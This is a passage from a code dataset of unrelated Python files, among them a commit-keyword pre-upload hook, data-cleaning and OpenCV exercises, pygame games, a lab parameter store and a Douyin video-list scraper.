files\r\n for j in os.listdir(baseline):\r\n if '.py' not in j and '.zip' not in j:\r\n getLineCount(j);\r\n\r\ndef getLineCount(infile):\r\n file = open(infile, 'r')\r\n ofile = open(outfile,'a')\r\n #Counts the lines in each file and multiplies by .75 and writes the result to the output file.\r\n count = 0\r\n for line in file:\r\n count+=1\r\n count = count*.75\r\n ofile.write('('+str(count).split('.')[0]+\",'\"+infile+\"')\\n\")\r\n\r\ngetDataFiles(baseline)","sub_path":"scripts/countLines.py","file_name":"countLines.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"190831683","text":"#!/usr/bin/env python3.4\n#\n# Copyright 2017 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport os\nimport re\nimport shellescape\n\nfrom acts.libs.proc import job\n\nGLOBAL_KEYWORDS_FILEPATH = 'vendor/google_testing/comms/framework/etc/' \\\n 'commit_keywords'\nLOCAL_KEYWORDS_FILEPATH = '~/.repo_acts_commit_keywords'\n\nGIT_FILE_ADDITIONS = r'git diff --unified=0 %s^! | grep \"^+\" | ' \\\n r'grep -Ev \"^(\\+\\+\\+ b/)\" | cut -c 2-'\n\nGIT_FILE_NAMES = r'git diff-tree --no-commit-id --name-only -r %s'\n\nGIT_DIFF_REGION_FOUND = 'git diff %s^! | grep -A10 -B10 %s'\nCOMMIT_ID_ENV_KEY = 'PREUPLOAD_COMMIT'\n\nFIND_COMMIT_KEYWORDS = 'git diff %s^! 
| grep -i %s'\nGET_EMAIL_ADDRESS = 'git log --format=%ce -1'\n\n\ndef find_in_commit_message(keyword_list):\n \"\"\"Looks for keywords in commit messages.\n\n Args:\n keyword_list: A list of keywords\n \"\"\"\n grep_args = ''\n for keyword in keyword_list:\n grep_args += '-e %s' % keyword\n\n result = job.run(\n FIND_COMMIT_KEYWORDS % (os.environ[COMMIT_ID_ENV_KEY], grep_args),\n ignore_status=True)\n\n if result.stdout:\n logging.error('Your commit message contains at least one keyword.')\n logging.error('Keyword(s) found in the following line(s):')\n logging.error(result.stdout)\n logging.error('Please fix/remove these before committing.')\n exit(1)\n\n\ndef get_words(string):\n \"\"\"Splits a string into an array of alphabetical words.\"\"\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1 \\2', string)\n s1 = re.sub('([a-z0-9])([A-Z])', r'\\1 \\2', s1).lower()\n s1 = re.sub('[^a-z ]', ' ', s1)\n return s1.split()\n\n\ndef find_in_file_names(keyword_list):\n \"\"\"Looks for keywords in file names.\n\n Args:\n keyword_list: a list of keywords\n \"\"\"\n changed_files = job.run(GIT_FILE_NAMES % os.environ[COMMIT_ID_ENV_KEY])\n\n keyword_set = set(keyword_list)\n\n for file_name in changed_files.stdout.split('\\n'):\n words = set(get_words(file_name))\n if len(keyword_set.intersection(words)) > 0:\n logging.error('Your commit has a file name that contain at least '\n 'one keyword: %s.' % file_name)\n logging.error('Please update or remove this before committing.')\n exit(1)\n\n\ndef find_in_code_additions(keyword_list):\n \"\"\"Looks for keywords in code additions.\n\n Args:\n keyword_list: a list of keywords\n \"\"\"\n all_additions = job.run(GIT_FILE_ADDITIONS % os.environ[COMMIT_ID_ENV_KEY])\n\n keyword_set = set(keyword_list)\n\n for line in all_additions.stdout.split('\\n'):\n words = set(get_words(line))\n if len(keyword_set.intersection(words)) > 0:\n result = job.run(GIT_DIFF_REGION_FOUND %\n (os.environ[COMMIT_ID_ENV_KEY],\n shellescape.quote(line)))\n logging.error('Your commit has code changes that contain at least '\n 'one keyword. Below is an excerpt from the commit '\n 'diff:')\n logging.error(result.stdout)\n logging.error('Please update or remove these before committing.')\n exit(1)\n\n\ndef main():\n if COMMIT_ID_ENV_KEY not in os.environ:\n logging.error('Missing commit id in environment.')\n exit(1)\n keyword_file = os.path.join(\n os.path.dirname(__file__), '../../../../%s' % GLOBAL_KEYWORDS_FILEPATH)\n\n if not os.path.isfile(keyword_file):\n keyword_file = os.path.expanduser(LOCAL_KEYWORDS_FILEPATH)\n if not os.path.exists(keyword_file) or not os.path.isfile(keyword_file):\n result = job.run(GET_EMAIL_ADDRESS)\n if result.stdout.endswith('@google.com'):\n logging.error(\n 'You do not have the necessary file %s. 
Please run '\n                'tools/ignore_commit_keywords.sh, or link it with the '\n                'following command:\\n ln -sf /%s %s'\n                % (LOCAL_KEYWORDS_FILEPATH, GLOBAL_KEYWORDS_FILEPATH,\n                   LOCAL_KEYWORDS_FILEPATH))\n            exit(1)\n        return\n\n    with open(keyword_file) as file:\n        keyword_list = file.read().lower().split()\n\n    find_in_code_additions(keyword_list)\n    find_in_commit_message(keyword_list)\n    find_in_file_names(keyword_list)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"tools/test/connectivity/tools/keyword_check.py","file_name":"keyword_check.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339776878","text":"import pandas as pd\nimport numpy as np \n\n#read the data\nsf_permits = pd.read_csv(\"Building_Permits.csv\")\n\n# set seed for reproducibility\nnp.random.seed(0) \n\n#get the number of missing data points per column\nmissing_values_count = sf_permits.isnull().sum()\n\n# total missing values \ntotal_cells =np.prod(sf_permits.shape)\ntotal_missing = missing_values_count.sum()\n\n# percent of data that is missing\npercent_missing = (total_missing/total_cells)*100\n\n#figure out why the data is missing\n#is this value missing because it wasn't recorded or because it doesn't exist?\n\n#Drop missing values rows\npermits_with_na_dropped = sf_permits.dropna()\n\n#Drop missing values: columns\n#Create a new DataFrame called sf_permits_with_na_dropped that has all of the columns with empty values removed.\nsf_permits_with_na_dropped = sf_permits.dropna(axis=1)\n\n#How many columns were removed from the original sf_permits DataFrame?\ncolumn_in_original = sf_permits.shape[1]\ncolumn_with_na_dropped= sf_permits_with_na_dropped.shape[1]\ndropped_columns = column_in_original - column_with_na_dropped\n\n#Filling in missing values automatically\n#replace all the NaN's in the sf_permits data with the one that comes directly after it and then replacing any remaining NaN's with 0\nsf_permits_with_na_imputed = sf_permits.fillna(method='bfill',axis=0).fillna(0)","sub_path":"HandlingMissingValue.py","file_name":"HandlingMissingValue.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439334638","text":"# Reverse Bits\n\n\n# 48ms\nclass Solution:\n    def reverseBits(self, n: int) -> int:\n        # leading zeros are lost here\n        n = str(bin(n))[2:]\n        n = list(reversed(n))\n        n.extend(['0'] * (32 - len(n)))\n        return int(''.join(n), 2)\n\n\ns = Solution()\nprint(s.reverseBits(0b00000010100101000001111010011100))\n","sub_path":"leetcode/others/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413338778","text":"from functools import reduce\n\n# prod = 1\n# list = [1,2,3,4]\n# for x in list:\n#     prod *= x\n# print(prod)\n#\n# print(reduce( (lambda x,y: x*y),\n#               [1,2,3,4]))\n\n# Use list comprehensions + reduce\n# * Frequency of a single word\n# * Total frequency of a group of words\n# * Most frequently occurring word\n\nlistOfWords = open(\"text.txt\", \"r\").read().split()\nlistOfWords = [w.lower().strip() for w in listOfWords]\n# print(listOfWords[0:150])\ntest = [\"a\", \"a\", \"b\", \"b\", \"b\", \"c\", \"c\", \"a\", \"b\", \"b\", \"c\", \"c\", \"a\", \"b\", \"b\"]\n\n#Completed\n#==========================================================================\ndef wordFrequency(word, list):\n    # l = [1 for x in test if x == word]\n    l = [1 for x 
in list if x == word]\n # return len(l)\n if len(l) == 0:\n return 0\n return reduce((lambda x,y: x+y), l)\n\n# print(wordFrequency(\"a\", test))\n# print(wordFrequency(\"b\", test))\n# print(wordFrequency(\"c\", test))\n# print(wordFrequency(\"d\", test))\n\n# print(wordFrequency(\"a\", listOfWords))\n# print(wordFrequency(\"I\", listOfWords))\n# print(wordFrequency(\"then\", listOfWords))\n# print(wordFrequency(\"Aristotle\", listOfWords))\n\ndef mostFrequentWord(list):\n return reduce((lambda x,y: x if wordFrequency(x, list) > wordFrequency(y, list) else y), list)\n\n# print(mostFrequentWord(listOfWords))\n# print(mostFrequentWord(test))\n\ndef wordGroupFrequency(wordGroup, list):\n wordGroupList = wordGroup.lower().split()\n numWords = len(wordGroupList)\n l = [1 for x in range(len(list)) if wordGroupList == list[x: x+numWords]]\n if len(l) == 0:\n return 0\n return reduce((lambda x,y: x+y), l)\n\n# print(wordGroupFrequency(\"a b b\", test))\nprint(wordGroupFrequency(\"the most\", listOfWords))\n#==========================================================================\n","sub_path":"20_anon-reduce/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"188111020","text":"parameter_vault = {\n \"DopplerCooling\": {\n \"doppler_cooling_duration\": 0e-6,\n \"doppler_cooling_repump_additional\": 0e-6,\n \"pre_duration\": 0e-6,\n \"doppler_cooling_frequency_397\": 80e6,\n \"doppler_cooling_amplitude_397\": 0.0,\n \"doppler_cooling_att_397\": 0.0,\n \"doppler_cooling_frequency_866\": 40e6,\n \"doppler_cooling_amplitude_866\": 0.0,\n \"doppler_cooling_att_866\": 0.0,\n },\n \"DriftTracker\": {\n \"current_b_field\": 4.0,\n \"current_line_center\": 0.0,\n },\n \"Excitation_729\": {\n \"rabi_excitation_frequency\": 0e3,\n \"rabi_excitation_amplitude\": 1.0,\n \"rabi_excitation_att\": 0.0,\n \"rabi_excitation_phase\": 0.0,\n \"channel_729\": \"729G\",\n \"rabi_excitation_duration\": 0e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n \"single_pass_amplitude\": 1.0,\n \"single_pass_att\": 0.0,\n },\n \"IonsOnCamera\": {\n \"ion_number\": 1,\n },\n \"LocalSpec\": {\n \"enable\": False,\n \"detuning\": 0.0,\n \"att\": 0.0,\n \"amp\": 1.0,\n \"duration\": 0e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n },\n \"MolmerSorensen\": {\n \"duration\": 50e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n \"line_selection_ion2\": \"S-1/2D-1/2\",\n \"due_carrier_enable\": False,\n \"selection_sideband\": \"axial_frequency\",\n \"detuning\": 6e3,\n \"detuning_carrier_1\": 0e3,\n \"detuning_carrier_2\": 0e3,\n \"amp_red\": 1.0,\n \"att_red\": 0.0,\n \"amp_blue\": 1.0,\n \"amp_blue_noise_std\": 0.0,\n \"att_blue\": 0.0,\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"amplitude_ion2\": 1.0,\n \"att_ion2\": 0.0,\n \"amp_blue_ion2\": 1.0,\n \"att_blue_ion2\": 0.0,\n \"amp_red_ion2\": 1.0,\n \"att_red_ion2\": 0.0,\n \"analysis_pulse_enable\": False,\n \"SDDS_enable\": False,\n \"SDDS_rotate_out\": False,\n \"rotate_in_with_global\": False,\n \"shape_profile\": 0,\n \"bichro_enable\": True,\n \"analysis_duration\": 5e-6,\n \"analysis_amplitude\": 1.0,\n \"analysis_att\": 0.0,\n \"analysis_amplitude_ion2\": 1.0,\n \"analysis_att_ion2\": 0.0,\n \"channel_729\": \"global\",\n \"ramsey_duration\": 20e-6,\n \"override_readout\": False,\n \"ms_phase\": 0.0,\n \"phase\": 0.0,\n \"sp_line1_amp\": 1.0,\n \"sp_line2_amp\": 1.0,\n \"sp_line1_att\": 0.0,\n \"sp_line2_att\": 0.0,\n \"sp_line1_blue_amp\": 1.0,\n 
\"sp_line2_blue_amp\": 1.0,\n \"sp_line1_blue_att\": 0.0,\n \"sp_line2_blue_att\": 0.0,\n \"sp_line1_red_amp\": 1.0,\n \"sp_line2_red_amp\": 1.0,\n \"sp_line1_red_att\": 0.0,\n \"sp_line2_red_att\": 0.0,\n \"sp_due_enable\": False,\n \"ac_stark_shift\": 0e3,\n },\n \"OpticalPumping\": {\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"optical_pumping_frequency_854\": 30e6,\n \"optical_pumping_amplitude_854\": 1.0,\n \"optical_pumping_att_854\": 0.0,\n \"line_selection\": \"S-1/2D+3/2\", \n },\n \"OpticalPumpingContinuous\": {\n \"optical_pumping_continuous_duration\": 100e-6,\n \"optical_pumping_continuous_repump_additional\": 0e-6,\n },\n \"RabiFlopping\": {\n \"line_selection\": \"S-1/2D-1/2\",\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"channel_729\": \"729G\",\n \"duration\": 5e-6,\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 0,\n \"detuning\": 0.0,\n \"composite_pi_rotation\": False,\n \"noise\": False,\n },\n \"Rotation729L1\": {\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"pi_time\": 2e-6,\n \"composite_pi_rotation\": False,\n },\n \"Rotation729G\": {\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"pi_time\": 2e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n },\n \"SidebandCooling\": {\n \"line_selection\": \"S-1/2D-5/2\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n \"stark_shift\": 0e3,\n \"channel_729\": \"729G\",\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"duration\": 100e-6,\n \"frequency_866\": 40e6,\n \"amplitude_866\": 1.0,\n \"att_866\": 0.0,\n \"frequency_854\": 20e6,\n \"amplitude_854\": 1.0,\n \"att_854\": 0.0,\n \"sideband_cooling_cycles\": 1,\n },\n \"SequentialSBCooling\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"SequentialSBCooling1\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"SequentialSBCooling2\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"StatePreparation\": {\n \"optical_pumping_enable\": False,\n \"aux_optical_pumping_enable\": False,\n \"pulsed_optical_pumping\": False,\n \"sideband_cooling_enable\": False,\n \"post_delay\": 0e-6,\n \"number_of_cycles\": 1,\n \"pulsed_854_duration\": 100e-6,\n \"pi_time\": 10e-6,\n \"channel_729\": \"729G\",\n \"pulsed_amplitude\": 1.0,\n \"pulsed_att\": 0.0,\n },\n \"StateReadout\": {\n \"readout_mode\": \"pmt\",\n \"repeat_each_measurement\": 100,\n },\n \"SZX\": {\n \"one_ion_vaet\": False,\n \"duration\": 10e-6,\n \"channel_729\": \"729G\",\n \"bichro_enable\": False,\n \"nu_effective\": 0e3,\n \"amp_blue\": 1.0,\n \"amp_red\": 1.0,\n \"att_blue\": 0.0,\n \"att_red\": 0.0,\n \"amplitude\": 1.0,\n \"local_rabi_amp\": 1.0,\n \"amplitude_L2\": 1.0,\n \"att_SP_L2\": 0.0,\n \"att\": 0.0,\n \"local_rabi_att\": 0.0,\n \"sideband_selection\": \"axial_frequency\",\n \"line_selection\": \"S-1/2D-1/2\",\n \"carrier_detuning\": 0e3,\n \"carrier_detuning_L1\": 0e3,\n \"phase\": 0.0,\n \"AC_stark_local\": 0.0,\n },\n \"TrapFrequencies\": {\n \"axial_frequency\": 1e6,\n \"radial_frequency_1\": 2e6,\n \"radial_frequency_2\": 2.4e6,\n },\n}\n\ndef get_collections():\n return parameter_vault.keys()\n\ndef get_parameter_names(collection):\n return parameter_vault[collection].keys()\n\ndef get_parameter(path):\n collection = path[0]\n name = path[1]\n return parameter_vault[collection][name]\n\ndef set_parameter(path, value):\n collection = path[0]\n if collection 
not in get_collections():\n raise Exception(f\"collection {collection} does not exist\")\n name = path[1]\n if name not in get_parameter_names(collection):\n raise Exception(f\"parameter {name} does not exist in collection {collection}\")\n parameter_vault[collection][name] = value\n","sub_path":"simulated_parameter_vault.py","file_name":"simulated_parameter_vault.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447469351","text":"import pygame as pg\r\nimport random\r\n\r\nLarguraPokemon,AlturaPokemon = 35,35\r\nXPokemon,YPokemon = random.randrange(0,666,35),random.randrange(0,596,35)\r\n\r\nGrupoPokemon = pg.sprite.Group()\r\nPokemon = pg.sprite.Sprite(GrupoPokemon)\r\nPokemon.image = pg.image.load('Colecionaveis/Recursos/Pikachu.png')\r\nPokemon.image = pg.transform.scale(Pokemon.image, [50,50])\r\nPokemon.rect = pg.Rect(XPokemon,YPokemon,LarguraPokemon,AlturaPokemon)","sub_path":"Colecionaveis/Dados/DadosPokemon.py","file_name":"DadosPokemon.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"627528000","text":"import os, sys, random\nimport pygame \nfrom pygame.locals import *\n\nfrom drew import *\n\ncanvas_width = 800\ncanvas_height = 600\n\nblock = (0,0,0)\n\nbricks_list = []\n\n# velocity\ndx = 4\ndy = -4\npaddle_speed = 0\n\n# game mode\n# 0:prepare\n# 1:playing\ngame_mode = 0\n\ndef showFont( text, x, y):\n global canvas \n text = font.render(text, 1, (150, 200, 200)) \n canvas.blit( text, (x,y))\n\ndef isCollision( x, y, boxRect):\n if (x >= boxRect[0] and x <= boxRect[0] + boxRect[2] and y >= boxRect[1] and y <= boxRect[1] + boxRect[3]):\n return True; \n #elif() \n return False; \n\ndef resetGame():\n global game_mode, brick_num, bricks_list, dx, dy\n\n #brick\n for bricks in bricks_list:\n r = random.randint(100,200)\n g = random.randint(100,200)\n b = random.randint(100,200)\n bricks.color = [r,g,b] \n bricks.visivle = True\n game_mode = 0\n brick_num = 99 \n dx = 8\n dy = -8\n\npygame.init()\n\npygame.display.set_caption(u\"Hello Pong!\")\n\ncanvas = pygame.display.set_mode((canvas_width, canvas_height))\n \nclock = pygame.time.Clock()\n\nfont = pygame.font.SysFont('Arial', 30)\n\n#paddle\npaddle_x = 360\npaddle_y = (canvas_height - 48)\npaddle = Box(pygame, canvas, \"paddle\", [paddle_x, paddle_y, 100, 24], (random.randint(100,200),random.randint(100,200),random.randint(100,200))) \n\n#ball\nball_x = 360\nball_y = paddle_y\nball = Circle(pygame, canvas, \"ball\", [ball_x, ball_x], 8, (random.randint(100,200),random.randint(100,200),random.randint(100,200)))\n\n#construct the brick\nbrick_num = 0\nbrick_x = 70\nbrick_y = 60\nbrick_w = 0\nbrick_h = 0\nfor i in range( 0, 90):\n if((i % 9)==0):\n brick_w = 0\n brick_h = brick_h + 28 \n bricks_list.append (Box(pygame, canvas, \"brick_\"+str(i), [ brick_w + brick_x, brick_h+ brick_y, 68, 26], [255,255,255]))\n brick_w = brick_w + 70\n\nresetGame()\n\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.key == pygame.K_RIGHT:\n paddle_speed = 10\n elif event.key == pygame.K_LEFT:\n paddle_speed = -10\n elif event.key == pygame.K_SPACE:\n if(game_mode == 0):\n game_mode = 1\n elif event.type == pygame.KEYUP:\n paddle_speed = 0\n paddle_x = paddle_speed + paddle_x\n\n 
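# [Editor's aside -- standalone sanity check, not part of the game loop: the
# isCollision test defined above is a point-in-rectangle check against a
# [left, top, width, height] box.]
def point_in_rect(x, y, rect):
    return (rect[0] <= x <= rect[0] + rect[2]
            and rect[1] <= y <= rect[1] + rect[3])

print(point_in_rect(5, 5, [0, 0, 10, 10]))    # True
print(point_in_rect(15, 5, [0, 0, 10, 10]))   # False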
canvas.fill(block)\n \n # bricks\n for bricks in bricks_list:\n if(isCollision( ball.pos[0], ball.pos[1], bricks.rect)):\n if(bricks.visivle): \n brick_num = brick_num -1\n if(brick_num <= 0):\n resetGame()\n break\n dy = -dy; \n bricks.visivle = False\n \n bricks.update()\n \n showFont( u\"Bricks Number:\"+str(brick_num), 8, 20) \n\n paddle.rect[0] = paddle_x\n paddle.update()\n\n if(isCollision( ball.pos[0], ball.pos[1], paddle.rect)): \n dy = -dy; \n if(game_mode == 0):\n ball.pos[0] = ball_x = paddle.rect[0] + ( (paddle.rect[2] - ball.radius) >> 1 )\n ball.pos[1] = ball_y = paddle.rect[1] - ball.radius \n if(paddle_x + paddle_speed >= canvas_width - 102):\n paddle_x = canvas_width-102\n if(paddle_x + paddle_speed <= 2):\n paddle_x = 2 \n elif(game_mode == 1):\n ball_x += dx\n ball_y += dy\n if(ball_y + dy > canvas_height - ball.radius):\n game_mode = 0 \n if(ball_x + dx > canvas_width - ball.radius or ball_x + dx < ball.radius):\n dx = -dx\n if(ball_y + dy > canvas_height - ball.radius or ball_y + dy < ball.radius): \n dy = -dy\n if(paddle_x + paddle_speed >= canvas_width - 102):\n paddle_x = canvas_width-102\n if(paddle_x + paddle_speed <= 2):\n paddle_x = 2 \n\n ball.pos[0] = ball_x\n ball.pos[1] = ball_y\n\n ball.update()\n\n showFont( u\"FPS:\" + str(clock.get_fps()), 8, 1) \n\n pygame.display.update()\n clock.tick(60)\n\npygame.quit()\nquit()\n","sub_path":"Hello Pong!/Hello Pong!.py","file_name":"Hello Pong!.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13384103","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 5 15:57:16 2020\n\n@author: ujwal\n\"\"\"\n\n#import libraries\nimport imutils \nimport cv2\n\n#load i/p image and show dimensions in form (width*height*depth)\nimage = cv2.imread(\"jp.png\")\n(h,w,d) = image.shape\nprint(\"width = {},height = {}, depth ={}\".format(w,h,d))\n\n#display image on screen\ncv2.imshow(\"Image\", image)\ncv2.waitKey(0)\n\n#accessing a bgr at certain location\n(B,G,R) = image(100,50)\nprint(\"R={}, G={}, B={}\".format(R, G, B))\n\n#cropping with slicing \n# extract a 100x100 pixel square ROI (Region of Interest) from the\n# input image starting at x=320,y=60 at ending at x=420,y=160\nroi = image[60:160, 320:420]\ncv2.imshow(\"ROI\", roi)\ncv2.waitKey(0)\n\n#resizing images\nresized = cv2.resize(image,(200,200))\ncv2.imshow(\"Fixed Resizing\", resized)\ncv2.waitKey(0)\n# this causes distortion\n\n#fix by aaspect ratio\nr = 300.0/w\ndim = (300,int(h*r))\nresized = cv2.resize(image,dim)\ncv2.imshow(\"Aspect Ratio Resize: \", resized)\ncv2.waitKey(0)\n\n#resize using imutils\nresized = imutils.resize(image, width = 300)\ncv2.imshow(\"Imutils Resize: \", resized)\ncv2.waitKey(0)\n\n#rotating image from center by 45 degrees\ncenter = (w//2,h//2)\nM = cv2.getRotationMatrix2D(center,-45,1.0)\nrotated = cv2.warpAffine(image, M, (w,h))\ncv2.imshow(\"OpenCV Rotation: \", rotated)\ncv2.waitKey(0)\n\n#rotation using imutils\nrotated = imutils.rotate(image,-45)\ncv2.imshow(\"Imutils Rotated: \", rotated)\ncv2.waitKey(0)\n\n#rotate withut clipping\nrotated = imutils.rotate_bound(image, -45)\ncv2.imshow(\"Rotate vound Rotate: \", rotated)\ncv2.waitKey(0)\n\n#image smoothing using gaussian blur\nblurred = cv2.GaussianBlur(image, (11,11),0)\ncv2.imshow(\"Gaussian Blurred: \", blurred)\ncv2.waitKey(0)\n\n#insert objects\n#2px thich red rectangle surrounding the face\noutput = image.copy()\ncv2.rectangle(output, (200, 0), (429, 0), (0, 0, 255), 
2)\ncv2.imshow(\"Rectangle\", output)\ncv2.waitKey(0)\n\n# draw a blue 20px (filled in) circle on the image centered at\n# x=300,y=150\noutput = image.copy()\ncv2.circle(output, (300, 150), 50, (255, 0, 0), -5)\ncv2.imshow(\"Circle\", output)\ncv2.waitKey(0)\n\n# draw a 5px thick red line from x=60,y=20 to x=400,y=200\noutput = image.copy()\ncv2.line(output, (60, 20), (400, 200), (0, 0, 255), 5)\ncv2.imshow(\"Line\", output)\ncv2.waitKey(0)\n\n# draw green text on the image\noutput = image.copy()\ncv2.putText(output, \"OpenCV + Jurassic Park!!!\", (10, 25), \n\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\ncv2.imshow(\"Text\", output)\ncv2.waitKey(0)\n\n\n\n\n","sub_path":"OpenCV/temp1.py","file_name":"temp1.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569084366","text":"#-*-coding:utf-8-*-\nimport json\nfrom selenium import webdriver\nimport requests,re\nimport time\n\nshare_id='83072448142'\nshare_url='https://www.douyin.com/share/user/{}'.format(share_id)\nwith open('decode_js.txt','r') as f:\n f5=f.read()\n\nwith open('decode_js1.txt','r') as f2:\n f6=f2.read().replace(\"&&&\",share_id)\n\n\n# headers={'User_Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}\nheaders={\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n}\nresponse=requests.get(share_url,headers=headers).text\n# print(response)\n#不需要匹配单引号,是url的字符串\npattern=re.compile(\"dytk: '(.*?)'\",re.S)\ndytk=re.findall(pattern,response)[0]\n# print(dytk)\n#注意匹配进去单引号,js里面的字符串括起来\npattern1=re.compile(r\"\",re.S)\ntac=\"var tac=\"+re.findall(pattern1,response)[0]+\";\"\n# print(tac)\n# \"\"\n\nwith open('decode_js.html','w') as f1:\n f1.write(f5+'\\n'+str(tac)+'\\n'+f6)\n # f1.write(f5 )\n\ndriver=webdriver.Chrome()\ndriver.get('C:\\spider\\douyinapp\\decode_js.html')\n_signature=driver.title\n# _signature=input('输入_signature密匙:')\n# print(_signature)\n# _signature=\nvideo_url='https://www.iesdouyin.com/web/api/v2/aweme/post/?user_id='+share_id+'&sec_uid=&count=21&max_cursor=0&aid=1128&_signature='+_signature+'&dytk='+dytk\nheaders1={\n# \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n# \"authority\":\"www.iesdouyin.com\",\n# \"method\":\"GET\",\n# \"path\":\"/web/api/v2/aweme/post/?user_id=83072448142&sec_uid=&count=21&max_cursor=0&aid=1128&_signature=0CJdgBATjXEVRwUNDT5v49AiXZ&dytk=0091c461fa8e5292f574d08e67c552b1\",\n# \"scheme\":\"https\",\n# \"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n# \"accept-encoding\":\"gzip,deflate, br\",\n# \"accept-language\":\"zh-CN,zh;q=0.9\",\n# # \"cache-control\":\"max-age=0\",\n# \"upgrade-insecure-requests\":\"1\",\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n}\nwhile 1:\n response=requests.get(video_url,headers=headers)\n # print(response.text,response.url)\n if json.loads(response.text)['aweme_list']==[]:\n time.sleep(1)\n driver.get(video_url)\n print(driver.page_source)\n break\n else:\n print(response.text, response.url)\n 
break\n","sub_path":"douyinapp/js_run.py","file_name":"js_run.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112582615","text":"from motion_detector import df\r\nfrom bokeh.plotting import figure, show, output_file\r\nfrom bokeh.models import HoverTool, ColumnDataSource\r\n\r\ndf[\"Start_formatted\"] = df[\"Start\"].dt.strftime(\"%Y-%m-%d %H:%M:%S\")\r\ndf[\"End_formatted\"] = df[\"End\"].dt.strftime(\"%Y-%m-%d %H:%M:%S\")\r\ncds = ColumnDataSource(df)\r\n\r\nfig = figure(x_axis_type='datetime', height=500, width=800,\r\n title=\"Motion detector graph\", align='center')\r\nfig.yaxis.minor_tick_line_color = None\r\nfig.ygrid[0].ticker.desired_num_ticks = 1\r\nhover = HoverTool(tooltips=[(\"Start \", \"@Start_formatted\"),\r\n (\"End \", \"@End_formatted\")])\r\nfig.add_tools(hover)\r\nq = fig.quad(left=\"Start\", right=\"End\", bottom=0, top=1, color=\"cyan\",\r\n source=cds)\r\noutput_file(\"graph.html\")\r\nshow(fig)\r\n","sub_path":"motion_detector/log_n_plot.py","file_name":"log_n_plot.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"66295895","text":"import sqlite3\n\nfrom config import *\n\n\ncon = sqlite3.connect(database)\ncur = con.cursor()\n\n\ndef sql(query):\n cur.execute(query)\n con.commit()\n\n\ndef select(query):\n cur.execute(query)\n return cur.fetchone()[0]\n\n\ndef db_init():\n sql(\"CREATE TABLE IF NOT EXISTS status (id INTEGER PRIMARY KEY, \\\n isParsed BOOLEAN,\\\n isDownloaded BOOLEAN,\\\n isTagged BOOLEAN)\")\n\n sql(\"CREATE TABLE IF NOT EXISTS tags (id INTEGER PRIMARY KEY,\\\n title TEXT,\\\n year 